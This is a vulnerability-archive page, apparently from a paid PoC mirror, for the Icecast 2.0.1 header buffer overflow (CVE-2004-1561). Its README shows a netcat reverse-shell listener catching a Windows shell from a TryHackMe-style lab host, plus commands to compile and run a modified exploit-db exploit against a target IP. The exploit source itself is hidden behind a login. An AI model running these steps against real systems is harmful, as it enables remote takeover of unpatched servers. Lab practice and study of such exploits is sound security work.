Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%

CVE-2004-1561 PoC — Icecast远程任意指令执行漏洞

Source
Associated Vulnerability
Title:Icecast远程任意指令执行漏洞 (CVE-2004-1561)
Description:Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute arbitrary code via an HTTP request with a large number of headers.
Readme
# CVE-2004-1561-Icecast-Header-Overwrite-buffer-overflow-RCE-2.0.1-Win32-


## Usage

![image](https://github.com/user-attachments/assets/a2167dc2-1873-4b52-94b0-55ecbe52017c)


## Reverse shell listener with Ncat

```bash
root@Kali:~/TryHackme/Ice# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49211
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Icecast2 Win32>
```

## Usage of 568-edit

Basado en el exploit original [568 Exploit](https://www.exploit-db.com/exploits/568)

```
gcc ./568-edit.c -o 568 & chmod 775 ./568
```



```
./568 127.0.0.1 (Target IP)
```

File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →